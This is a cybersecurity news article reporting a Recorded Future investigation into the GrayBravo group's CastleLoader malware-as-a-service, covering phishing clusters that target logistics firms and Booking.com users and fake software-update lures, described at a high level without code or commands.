CastleLoader PhaaS: GrayBravo Escalates Attacks on Logistics & Booking.com
The cybercriminal group GrayBravo, formerly known as TAG-150, continues to evolve at a rapid pace, demonstrating a high degree of technical sophistication, operational flexibility, and an ability to scale its infrastructure. A new investigation by Recorded Future has identified four independent clusters of malicious activity built around the multifunctional CastleLoader, reinforcing the assessment that GrayBravo operates under a subscription-based malware-as-a-service model.
One such cluster, tracked as TAG-160, primarily targets logistics companies. The attackers impersonate well-known carriers and conduct phishing campaigns using forged documents and links crafted with the ClickFix technique.
Victims receive messages purporting to come from companies such as England Logistics, urging them to open a link to confirm freight pricing. Following the link leads to a counterfeit page that instructs users to perform a sequence of actions, ultimately resulting in the covert download and execution of malware. In addition to CastleLoader, payloads observed in these attacks include HijackLoader, Rhadamanthys, and zgRAT.
To enhance credibility, the operators leverage compromised accounts and domains previously associated with legitimate businesses. They also create fraudulent profiles on logistics platforms such as DAT Freight & Analytics and Loadlink Technologies, enabling them to harvest contact details of potential victims, craft phishing lures based on authentic logistics data, and potentially even post fake freight listings embedded with malicious links.
A second cluster, designated TAG-161, exploits the recognizable Booking.com brand. These campaigns not only distribute CastleLoader but also deploy the Matanbuchus malware, a loader designed to retrieve additional malicious components. The cluster’s infrastructure is directly controlled by the attackers and includes proprietary tools for mass phishing distribution and redirect generation. These systems allow emails to be sent from compromised SMTP servers and route victims to infected websites masquerading as legitimate accommodation booking services.
The involvement of underground forum users adds further depth to the investigation. One alias, “Sparja,” is believed to have ties to CastleLoader. Analysts noted a malware control panel that displayed the name Sparja in place of a standard identifier. This individual has previously shown interest in loader development and discussed defense-evasion techniques within illicit communities. The timing of this activity aligns closely with CastleLoader’s emergence, suggesting possible involvement in its development or dissemination.
GrayBravo’s operations extend well beyond isolated campaigns and continue to broaden in scope. CastleLoader is delivered not only via phishing emails but also through fake software updates hosted on spoofed websites designed to mimic legitimate services. In one case, attackers impersonated downloads of the Zabbix administration platform to distribute the NetSupport RAT.
Although there are no public advertisements offering services, the consistent use of CastleLoader, the diversity of secondary payloads, and the presence of dedicated management panels strongly indicate a service-based operating model. Most infrastructure components—including control panels and command servers—communicate exclusively within a closed ecosystem, with access granted to a limited number of external parties, likely partners or tenants.
Confirmed infections in the United States and activity linked to educational institutions highlight both the geographic breadth of victims and the adaptability of the attackers’ tactics. In some cases, victims appear to have connected to malicious infrastructure via campus Wi-Fi networks, complicating efforts to accurately assess the scale of compromise.
As adoption of CastleLoader grows and new malicious tools are integrated, GrayBravo is poised to further entrench itself within the cybercriminal landscape. The group continues to refine its delivery mechanisms, evasion techniques, and command-and-control capabilities, underscoring its capacity for sustained and increasingly sophisticated operations.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
